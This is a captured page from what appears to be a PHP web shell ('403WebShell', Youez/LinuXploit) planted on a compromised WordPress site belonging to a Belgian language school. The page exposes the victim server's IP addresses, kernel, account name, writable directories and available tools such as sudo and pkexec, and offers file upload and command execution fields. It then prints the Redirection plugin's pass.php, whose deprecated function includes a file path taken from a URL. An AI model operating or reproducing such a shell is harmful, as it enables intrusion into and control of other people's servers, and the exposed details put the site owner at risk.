Uname:Linux EDL-STRETCH 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

403WebShell
403Webshell
Server IP : 188.114.97.4  /  Your IP : 104.23.243.201
Web Server : Apache/2.4.59 (Debian)
System : Linux EDL-STRETCH 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
User : edlftp ( 1002)
PHP Version : 7.4.33
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/nicolasj/www/b2b.ecoledelangues.be/wp-content/plugins/redirection/actions/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/nicolasj/www/b2b.ecoledelangues.be/wp-content/plugins/redirection/actions/pass.php
<?php

class Pass_Action extends Red_Action {
	public function process_external( $url ) {
		echo @wp_remote_fopen( $url );
	}

	/**
	 * This is deprecated and will be removed in a future version
	 */
	public function process_file( $url ) {
		$parts = explode( '?', substr( $url, 7 ) );

		if ( count( $parts ) > 1 ) {
			// Put parameters into the environment
			$args = explode( '&', $parts[1] );

			if ( count( $args ) > 0 ) {
				foreach ( $args as $arg ) {
					$tmp = explode( '=', $arg );

					if ( count( $tmp ) === 1 ) {
						$_GET[ $arg ] = '';
					} else {
						$_GET[ $tmp[0] ] = $tmp[1];
					}
				}
			}
		}

		@include $parts[0];
	}

	public function process_internal( $target ) {
		// Another URL on the server
		$_SERVER['REQUEST_URI'] = $target;

		if ( strpos( $target, '?' ) ) {
			$_SERVER['QUERY_STRING'] = substr( $target, strpos( $target, '?' ) + 1 );
			parse_str( $_SERVER['QUERY_STRING'], $_GET );
		}

		return true;
	}

	public function is_external( $target ) {
		return substr( $target, 0, 7 ) === 'http://' || substr( $target, 0, 8 ) === 'https://';
	}

	public function process_before( $code, $target ) {
		// External target
		if ( $this->is_external( $target ) ) {
			$this->process_external( $target );
			exit();
		}

		return $this->process_internal( $target );
	}

	public function needs_target() {
		return true;
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit